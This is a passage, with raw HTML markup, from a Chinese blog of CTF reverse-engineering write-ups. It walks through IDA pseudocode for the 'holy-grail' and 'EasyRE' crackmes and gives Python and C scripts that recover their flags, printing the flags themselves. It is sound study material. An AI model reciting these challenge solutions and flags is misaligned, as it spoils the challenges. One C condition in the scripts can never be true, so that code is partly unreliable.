class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"><span class="keyword">char</span> a[]={<span class="number">0x0D</span>, <span class="number">0x13</span>, <span class="number">0x17</span>, <span class="number">0x11</span>, <span class="number">0x2</span>, <span class="number">0x1</span>, <span class="number">0x20</span>, <span class="number">0x1D</span>, <span class="number">0x0C</span>, <span class="number">0x2</span>, <span class="number">0x19</span>, <span class="number">0x2F</span>, <span class="number">0x17</span>, <span class="number">0x2B</span>, <span class="number">0x24</span>, <span class="number">0x1F</span>, <span class="number">0x1E</span>, <span class="number">0x16</span>, <span class="number">0x9</span>, <span class="number">0x0F</span>, <span class="number">0x15</span>, <span class="number">0x27</span>, <span class="number">0x13</span>, <span class="number">0x26</span>, <span class="number">0x0A</span>, <span class="number">0x2F</span>, <span class="number">0x1E</span>, <span class="number">0x1A</span>, <span class="number">0x2D</span>, <span class="number">0x0C</span>, <span class="number">0x22</span>,<span class="number">0x4</span>};</span><br><span class="line"><span class="keyword">char</span> b[]=<span class="string">"GONDPHyGjPEKruv{{pj]X@rF"</span>;</span><br><span class="line"><span class="keyword">int</span> i;</span><br><span class="line"><span class="keyword">char</span> j;</span><br><span class="line"><span class="keyword">for</span>(i=<span class="number">0</span>;i<<span class="number">24</span>;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">for</span>(j=<span class="number">0X0</span>;j<<span class="number">0X7f</span>;j++){</span><br><span class="line"><span class="keyword">if</span>(b[i]==(a[i]^((j^<span class="number">0x55</span>)+<span class="number">0x48</span>)))</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span> (<span class="number">0x40</span><j&&j<<span class="number">0x5B</span>)</span><br><span class="line">j+=<span class="number">0x20</span>;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(<span class="number">0x60</span><j&&j<<span class="number">0x5B</span>)</span><br><span class="line">j-=<span class="number">20</span>;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"%c"</span>,j);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"\n"</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>这里新学了一个ida小知识,<em>数据可以用快捷键shift+E,在hex-view窗口里提取数据(这样就不用跟我一样一个一个输了)</em>。</p><h3 id="reverse-for-the-holy-grail-350"><a href="#reverse-for-the-holy-grail-350" class="headerlink" title="reverse-for-the-holy-grail-350"></a>reverse-for-the-holy-grail-350</h3><p>64位elf文件,拖入ida静态调试</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/XRnHwaFJ57M4bS9.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>查看主函数</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> v3; <span class="comment">// ebx</span></span><br><span class="line"> <span class="keyword">int</span> v4; <span class="comment">// ebx</span></span><br><span class="line"> __int64 v5; <span class="comment">// rbx</span></span><br><span class="line"> <span class="keyword">void</span> *v7; <span class="comment">// [rsp+0h] [rbp-70h]</span></span><br><span class="line"> __int64 v8; <span class="comment">// [rsp+10h] [rbp-60h]</span></span><br><span class="line"> <span class="keyword">void</span> *v9; <span class="comment">// [rsp+20h] [rbp-50h]</span></span><br><span class="line"> __int64 v10; <span class="comment">// [rsp+30h] [rbp-40h]</span></span><br><span class="line"> <span class="keyword">void</span> *v11; <span class="comment">// [rsp+40h] [rbp-30h]</span></span><br><span class="line"> __int64 v12; <span class="comment">// [rsp+48h] [rbp-28h]</span></span><br><span class="line"> <span class="keyword">char</span> v13; <span class="comment">// [rsp+50h] [rbp-20h]</span></span><br><span class="line"></span><br><span class="line"> v11 = &v13;</span><br><span class="line"> v12 = <span class="number">0L</span>L;</span><br><span class="line"> v13 = <span class="number">0</span>;</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"What... is your name?"</span>, <span class="number">21L</span>L);</span><br><span class="line"> <span class="built_in">std</span>::<span class="built_in">endl</span><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>);</span><br><span class="line"> <span class="built_in">std</span>::<span class="keyword">operator</span>>><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>,<span class="built_in">std</span>::allocator<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cin</span>, &v11);</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"What... is your quest?"</span>, <span class="number">22L</span>L);</span><br><span class="line"> <span class="built_in">std</span>::<span class="built_in">endl</span><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>);</span><br><span class="line"> <span class="built_in">std</span>::istream::ignore((<span class="built_in">std</span>::istream *)&<span class="built_in">std</span>::<span class="built_in">cin</span>);</span><br><span class="line"> <span class="built_in">std</span>::getline<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>,<span class="built_in">std</span>::allocator<<span class="keyword">char</span>>>((__int64)&<span class="built_in">std</span>::<span class="built_in">cin</span>, (__int64)&v11);</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"What... is the secret password?"</span>, <span class="number">32L</span>L);</span><br><span class="line"> <span class="built_in">std</span>::<span class="built_in">endl</span><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>);</span><br><span class="line"> <span class="built_in">std</span>::<span class="keyword">operator</span>>><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>,<span class="built_in">std</span>::allocator<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cin</span>, &userIn);</span><br><span class="line"> v7 = &v8;</span><br><span class="line"> <span class="built_in">std</span>::__cxx11::basic_string<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>,<span class="built_in">std</span>::allocator<<span class="keyword">char</span>>>::_M_construct<<span class="keyword">char</span> *>(</span><br><span class="line"> (__int64 *)&v7,</span><br><span class="line"> (_BYTE *)userIn,</span><br><span class="line"> (_BYTE *)(qword_601AE8 + userIn));</span><br><span class="line"> v3 = validChars((__int64 *)&v7);</span><br><span class="line"> <span class="keyword">if</span> ( v7 != &v8 )</span><br><span class="line"> <span class="function"><span class="keyword">operator</span> <span class="title">delete</span><span class="params">(v7)</span></span>;</span><br><span class="line"> <span class="keyword">if</span> ( v3 < <span class="number">0</span> )</span><br><span class="line"> <span class="keyword">goto</span> LABEL_14;</span><br><span class="line"> v9 = &v10;</span><br><span class="line"> <span class="built_in">std</span>::__cxx11::basic_string<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>,<span class="built_in">std</span>::allocator<<span class="keyword">char</span>>>::_M_construct<<span class="keyword">char</span> *>(</span><br><span class="line"> (__int64 *)&v9,</span><br><span class="line"> (_BYTE *)userIn,</span><br><span class="line"> (_BYTE *)(qword_601AE8 + userIn));</span><br><span class="line"> v4 = stringMod((__int64 *)&v9); <span class="comment">//stringMod是我们解出此题的关键</span></span><br><span class="line"> <span class="keyword">if</span> ( v9 != &v10 ) <span class="comment">//这里是关键函数</span></span><br><span class="line"> <span class="function"><span class="keyword">operator</span> <span class="title">delete</span><span class="params">(v9)</span></span>;</span><br><span class="line"> <span class="keyword">if</span> ( v4 < <span class="number">0</span> )</span><br><span class="line"> {</span><br><span class="line">LABEL_14:</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"Auuuuuuuugh"</span>, <span class="number">11L</span>L);</span><br><span class="line"> <span class="built_in">std</span>::<span class="built_in">endl</span><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"Go on. Off you go. tuctf{"</span>, <span class="number">25L</span>L);</span><br><span class="line"> v5 = <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, userIn, qword_601AE8);</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(v5, <span class="string">"}"</span>, <span class="number">1L</span>L);</span><br><span class="line"> <span class="built_in">std</span>::<span class="built_in">endl</span><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(v5);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( v11 != &v13 )</span><br><span class="line"> <span class="function"><span class="keyword">operator</span> <span class="title">delete</span><span class="params">(v11)</span></span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>加密还有 check 函数 全部都在stringMod 这个函数里面</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">stringMod</span><span class="params">(__int64 *a1)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> __int64 length; <span class="comment">// r9</span></span><br><span class="line"> <span class="keyword">char</span> *c_str; <span class="comment">// r10</span></span><br><span class="line"> __int64 i; <span class="comment">// rcx</span></span><br><span class="line"> <span class="keyword">signed</span> <span class="keyword">int</span> v4; <span class="comment">// er8</span></span><br><span class="line"> <span class="keyword">int</span> *temp_2; <span class="comment">// rdi</span></span><br><span class="line"> <span class="keyword">int</span> *temp_3; <span class="comment">// rsi</span></span><br><span class="line"> <span class="keyword">signed</span> <span class="keyword">int</span> t; <span class="comment">// ecx</span></span><br><span class="line"> <span class="keyword">signed</span> <span class="keyword">int</span> j; <span class="comment">// er9</span></span><br><span class="line"> <span class="keyword">int</span> index; <span class="comment">// er10</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> tmp; <span class="comment">// eax</span></span><br><span class="line"> <span class="keyword">int</span> sign; <span class="comment">// esi</span></span><br><span class="line"> <span class="keyword">int</span> v12; <span class="comment">// esi</span></span><br><span class="line"> <span class="keyword">int</span> temp[<span class="number">24</span>]; <span class="comment">// [rsp+0h] [rbp-60h]</span></span><br><span class="line"></span><br><span class="line"> <span class="built_in">memset</span>(temp, <span class="number">0</span>, <span class="number">0x48</span>uLL);</span><br><span class="line"> length = a1[<span class="number">1</span>];</span><br><span class="line"> <span class="keyword">if</span> ( length )</span><br><span class="line"> {</span><br><span class="line"> c_str = (<span class="keyword">char</span> *)*a1;</span><br><span class="line"> i = <span class="number">0L</span>L;</span><br><span class="line"> v4 = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">do</span></span><br><span class="line"> {</span><br><span class="line"> v12 = c_str[i];</span><br><span class="line"> temp[i] = v12;</span><br><span class="line"> <span class="keyword">if</span> ( <span class="number">3</span> * ((<span class="keyword">unsigned</span> <span class="keyword">int</span>)i / <span class="number">3</span>) == (_DWORD)i && v12 != firstchar[(<span class="keyword">unsigned</span> <span class="keyword">int</span>)i / <span class="number">3</span>] )<span class="comment">// 当i是3的倍数时,str=first[i/3]</span></span><br><span class="line"> <span class="comment">// { 65, 105, 110, 69, 111, 97}</span></span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> ++i;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( i != length );</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> v4 = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> temp_2 = temp;</span><br><span class="line"> temp_3 = temp;</span><br><span class="line"> t = <span class="number">666</span>;</span><br><span class="line"> <span class="keyword">do</span></span><br><span class="line"> {</span><br><span class="line"> *temp_3 = t ^ *(<span class="keyword">unsigned</span> __int8 *)temp_3;</span><br><span class="line"> t += t % <span class="number">5</span>;</span><br><span class="line"> ++temp_3;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( &temp[<span class="number">18</span>] != temp_3 ); <span class="comment">// 异或操作</span></span><br><span class="line"> j = <span class="number">1</span>;</span><br><span class="line"> index = <span class="number">0</span>;</span><br><span class="line"> tmp = <span class="number">1</span>;</span><br><span class="line"> sign = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">do</span> <span class="comment">// 0,1,2 每三个数验证</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( sign == <span class="number">2</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( *temp_2 != thirdchar[index] ) <span class="comment">// { 751, 708, 732, 711, 734, 764, 0, 0 }</span></span><br><span class="line"> <span class="comment">// temp[2]=</span></span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> <span class="keyword">if</span> ( tmp % *temp_2 != masterArray[index] )<span class="comment">// { 471, 12, 580, 606, 147, 108 }</span></span><br><span class="line"> <span class="comment">//</span></span><br><span class="line"> <span class="comment">// temp[0]*temp[1]%temp[2]=</span></span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> ++index;</span><br><span class="line"> tmp = <span class="number">1</span>;</span><br><span class="line"> sign = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="comment">// sign 0,1,</span></span><br><span class="line"> {</span><br><span class="line"> tmp *= *temp_2; <span class="comment">// 0 tmp=temp[0]</span></span><br><span class="line"> <span class="comment">// 1 tmp=temp[0]*temp[1]</span></span><br><span class="line"> <span class="keyword">if</span> ( ++sign == <span class="number">3</span> )</span><br><span class="line"> sign = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> ++j;</span><br><span class="line"> ++temp_2;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( j != <span class="number">19</span> ); <span class="comment">// 18循环</span></span><br><span class="line"> <span class="keyword">return</span> (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(t * v4);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>stringMod函数校验过程一共分为三部分,第一部分中需要值得注意的是:<br><code>v3</code>是int型,除以一个数后小数部分会被去掉,所以<code>3 * ((unsigned int)v3 / 3) == (_DWORD)v3</code>成立的条件是<code>v3</code>是<code>3</code>的倍数,因此flag的第 <code>3*n</code> 个字符对应firstchar的六个字符</p><p>脚本</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line">i = <span class="number">666</span></span><br><span class="line">num = [] # v7</span><br><span class="line">flag = 'A**i**n**E**o**a**' # flag第0+3*n位对应firstchar</span><br><span class="line">Xorflag = [] # flag每位与v7异或的结果</span><br><span class="line">thirdchar = [<span class="number">0x2ef</span>, <span class="number">0x2c4</span>, <span class="number">0x2dc</span>, <span class="number">0x2c7</span>, <span class="number">0x2de</span>, <span class="number">0x2fc</span>]</span><br><span class="line">masterarray = [<span class="number">0x1d7</span>, <span class="number">0xc</span>, <span class="number">0x244</span>, <span class="number">0x25e</span>, <span class="number">0x93</span>, <span class="number">0x6c</span>]</span><br><span class="line"><span class="keyword">for</span> j in range(<span class="number">18</span>): # 求v7</span><br><span class="line"> num.append(i)</span><br><span class="line"> i += (i % <span class="number">5</span>)</span><br><span class="line">temp_num = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i in range(<span class="number">2</span>, len(flag)+<span class="number">1</span>, <span class="number">3</span>): # 求flag 第 <span class="number">1</span>+<span class="number">3</span>*n位</span><br><span class="line"> temp = thirdchar[temp_num] ^ num[i]</span><br><span class="line"> temp_num += <span class="number">1</span></span><br><span class="line"> flag = flag[:i] + chr(temp) + flag[i+<span class="number">1</span>:]</span><br><span class="line">temp_num = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i in range(len(flag)): # flag每位与v7异或</span><br><span class="line"> temp = ord(flag[i]) ^ num[i]</span><br><span class="line"> Xorflag.append(temp)</span><br><span class="line"><span class="keyword">for</span> i in range(<span class="number">1</span>, <span class="number">19</span>, <span class="number">3</span>): # 求flag第<span class="number">1</span>+<span class="number">3</span>*n位</span><br><span class="line"> <span class="keyword">for</span> j in range(<span class="number">32</span>, <span class="number">128</span>):</span><br><span class="line"> j ^= num[i]</span><br><span class="line"> temp = j * Xorflag[i<span class="number">-1</span>] % Xorflag[i+<span class="number">1</span>]</span><br><span class="line"> <span class="keyword">if</span> temp == masterarray[temp_num]:</span><br><span class="line"> flag = flag[:i] + chr(j ^ num[i]) + flag[i+<span class="number">1</span>:]</span><br><span class="line"> temp_num += <span class="number">1</span></span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">"tuctf{"</span> + flag + <span class="string">'}'</span>)</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/6VdtmXQo5x9hBwT.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="EasyRE"><a href="#EasyRE" class="headerlink" title="EasyRE"></a>EasyRE</h3><p>不知道逆向题做到什么时候能有突破,不知道未来的方向在哪里,不知道我未来靠这个能做些什么,不知道自己何时能变得更强,眼下学了一年得逆向还在这做EasyRE,可笑可笑!</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/dYo5zKEVjL3lJXp.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>32位文件,无壳直接用IDA打开</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/TxaPeuctCnb7qyz.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Shift+F12查看字符串窗口,发现flag,但是并不对。<br>注意到下面的right\n,是start函数,查看其伪代码。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">signed</span> <span class="keyword">int</span> __usercall start@<eax>(<span class="keyword">int</span> a1@<ebp>, <span class="keyword">int</span> a2@<esi>)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">char</span> v2; <span class="comment">// bl</span></span><br><span class="line"> <span class="keyword">signed</span> <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line"> <span class="keyword">int</span> v4; <span class="comment">// ST14_4</span></span><br><span class="line"> _DWORD *v5; <span class="comment">// eax</span></span><br><span class="line"> _DWORD *v6; <span class="comment">// esi</span></span><br><span class="line"> _DWORD *v7; <span class="comment">// eax</span></span><br><span class="line"> _DWORD *v8; <span class="comment">// esi</span></span><br><span class="line"> <span class="keyword">int</span> v9; <span class="comment">// edi</span></span><br><span class="line"> <span class="keyword">int</span> v10; <span class="comment">// esi</span></span><br><span class="line"> _DWORD *v11; <span class="comment">// eax</span></span><br><span class="line"> <span class="keyword">int</span> v12; <span class="comment">// et1</span></span><br><span class="line"></span><br><span class="line"> sub_4017C7();</span><br><span class="line"> <span class="keyword">if</span> ( !(<span class="keyword">unsigned</span> __int8)sub_40157C(<span class="number">1</span>)</span><br><span class="line"> || (v2 = <span class="number">0</span>, *(_BYTE *)(a1 - <span class="number">25</span>) = <span class="number">0</span>, *(_DWORD *)(a1 - <span class="number">4</span>) = <span class="number">0</span>, *(_BYTE *)(a1 - <span class="number">36</span>) = sub_40154A(), dword_403334 == <span class="number">1</span>) )</span><br><span class="line"> {</span><br><span class="line"> sub_401885(<span class="number">7</span>);</span><br><span class="line"> <span class="keyword">goto</span> LABEL_20;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( dword_403334 )</span><br><span class="line"> {</span><br><span class="line"> v2 = <span class="number">1</span>;</span><br><span class="line"> *(_BYTE *)(a1 - <span class="number">25</span>) = <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> dword_403334 = <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">if</span> ( initterm_e(&unk_4020D4, &unk_4020E0) )</span><br><span class="line"> {</span><br><span class="line"> *(_DWORD *)(a1 - <span class="number">4</span>) = <span class="number">-2</span>;</span><br><span class="line"> result = <span class="number">255</span>;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_18;</span><br><span class="line"> }</span><br><span class="line"> initterm(&unk_4020C8, &unk_4020D0);</span><br><span class="line"> dword_403334 = <span class="number">2</span>;</span><br><span class="line"> }</span><br><span class="line"> sub_4016E5(*(_DWORD *)(a1 - <span class="number">36</span>));</span><br><span class="line"> v5 = (_DWORD *)sub_401879(v4);</span><br><span class="line"> v6 = v5;</span><br><span class="line"> <span class="keyword">if</span> ( *v5 && (<span class="keyword">unsigned</span> __int8)sub_401651(v5) )</span><br><span class="line"> ((<span class="keyword">void</span> (__thiscall *)(_DWORD, _DWORD, <span class="keyword">signed</span> <span class="keyword">int</span>, _DWORD))*v6)(*v6, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line"> v7 = (_DWORD *)sub_40187F();</span><br><span class="line"> v8 = v7;</span><br><span class="line"> <span class="keyword">if</span> ( *v7 && (<span class="keyword">unsigned</span> __int8)sub_401651(v7) )</span><br><span class="line"> register_thread_local_exe_atexit_callback(*v8);</span><br><span class="line"> v9 = get_initial_narrow_environment();</span><br><span class="line"> v10 = *(_DWORD *)_p___argv();</span><br><span class="line"> v11 = (_DWORD *)_p___argc();</span><br><span class="line"> a2 = sub_401080(*v11, v10, v9);</span><br><span class="line"> <span class="keyword">if</span> ( !(<span class="keyword">unsigned</span> __int8)sub_4019A4() )</span><br><span class="line">LABEL_20:</span><br><span class="line"> <span class="built_in">exit</span>(a2);</span><br><span class="line"> <span class="keyword">if</span> ( !v2 )</span><br><span class="line"> cexit();</span><br><span class="line"> sub_401702(<span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line"> *(_DWORD *)(a1 - <span class="number">4</span>) = <span class="number">-2</span>;</span><br><span class="line"> result = a2;</span><br><span class="line">LABEL_18:</span><br><span class="line"> v12 = *(_DWORD *)(a1 - <span class="number">16</span>);</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>先拖进IDA 里看看吧!找到之前命令行中的提示字符串 <code>input</code> ,找到交叉引用该字符串的地方为函数sub_401080。(在查看strings windows的时候眼前一亮发现有个 <code>flag{NP2NiaNXx1ClGYVQ50}</code> ,但是输入以后发现并不是真正的flag…</p><p>F5查看函数sub_401080的伪代码。字符串 <code>input</code> 的地址为0x402150,结合代码,可以判断sub_401020函数为printf函数。再往下发现地址0x402158开始的字符串为%s,说明sub_401050应该是scanf函数,将用户输入保存到v7中。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/HJRNUExsLfdrIa4.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>得到输入以后,对v7的长度进行检查,从代码中可知v7长度必须为24个字符。</p><p>接下来以 v8地址+7 位置处的字符赋值给v2,根据IDA的分析提示,v7的起始地址为ebp-24h(ebp-36), v8的起始地址为ebp-14h(ebp-20)。假设我输入的是<code>abcdefghijklmnopqrstuvwx</code> ,那么在栈中应该是下面的情况。也就是v2的初始值是用户输入的最后一个字符<code>x</code>。</p><table><thead><tr><th></th><th></th><th></th></tr></thead><tbody><tr><td>高地址</td><td>ebp-13</td><td>x</td></tr><tr><td>|</td><td>ebp-14</td><td>w</td></tr><tr><td>|</td><td>…</td><td>…</td></tr><tr><td>|</td><td>ebp-20</td><td>q</td></tr><tr><td>|</td><td>…</td><td>…</td></tr><tr><td>↓</td><td>ebp-35</td><td>b</td></tr><tr><td>低地址</td><td>ebp-36</td><td>a</td></tr></tbody></table><p>每次循环中通过v1控制对用户输入字符串的遍历,将v2的值赋值给v3,然后v2地址自减1,也就是逆序取下一个字符。将v3保存的当前字符赋值给数组 byte_40336C[v1]。所以这个部分其实就是逆序提取用户输入,保存到数组byte_40336C的过程。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/NWSZ7a84IdFbXRV.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>接下来对数组byte_40336C的每个值x进行 (x+1)^6的操作。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/qzIwdZk8x4KueV9.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>最后将数组byte_40336C,也就是一个字符串,与地址0x402124开始的字符串进行比较。如果相同,即strcmp返回值为0,则调用printf函数输出 <code>right\n</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/yoPcI9VbzH2JxSF.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>双击unk_402124,选中24个字符,按下 <code>Shift + E</code> 提取,选择 <code>string literal</code> ,得到的字符串为: <code>xIrCj~<r|2tWsv3PtI\x7Fzndka</code> 。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/FNnVfoygbApRHrv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>至此,整个程序的逻辑很清楚了:</p><ul><li>在第1个部分中,读取用户输入</li><li>在第2部分中,判断用户输入的长度。逆序提取用户输入,保存到数组中(其实是个字符串)</li><li>在第3部分中,对数组每个值x进行 (x+1)^6的操作</li><li>在第4部分中,检查得到的数组(字符串)与<code>xIrCj~<r|2tWsv3PtI\x7Fzndka</code> 是否相等,相等则成功解决。<br><img src="https://i.loli.net/2020/12/22/je4LdMXsZ6zIQpD.png" alt=""></li></ul><p>用python写脚本逆出正确的输入 <code>flag{xNqU4otPq3ys9wkDsN}</code>:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># user_input逆序,存到arr数组中</span></span><br><span class="line"><span class="comment"># arr中的每个字符,进行 (i+1)^6 的操作</span></span><br><span class="line"><span class="comment"># 将arr与target比较,相同的时候输出"right"</span></span><br><span class="line">target=<span class="string">'xIrCj~<r|2tWsv3PtI\x7Fzndka'</span></span><br><span class="line">res = <span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> target:</span><br><span class="line"> tmp = (ord(i) ^ <span class="number">6</span>) - <span class="number">1</span> <span class="comment"># 异或的优先级!!</span></span><br><span class="line"> tmp_char = chr(tmp)</span><br><span class="line"> <span class="comment"># print("tmp:{}, tmp_char:{}".format(tmp, tmp_char))</span></span><br><span class="line"> res += tmp_char</span><br><span class="line"> </span><br><span class="line">res = res[::<span class="number">-1</span>] <span class="comment">#逆序</span></span><br><span class="line">print(res) <span class="comment"># flag{xNqU4otPq3ys9wkDsN}</span></span><br></pre></td></tr></table></figure></div><p>编写脚本的过程中有两个需要注意的:</p><p>1.异或运算的逆运算还是异或,比如:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">x = <span class="number">5</span></span><br><span class="line">y = x^<span class="number">6</span> <span class="comment"># 3, 0b101 ^ 0b110 => 0b011</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 已知y,求x</span></span><br><span class="line">x = y^<span class="number">6</span> <span class="comment"># 0b011 ^ 0b110 => 0b101</span></span><br></pre></td></tr></table></figure></div><p>2.异或运算的优先级是低于减号的:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" 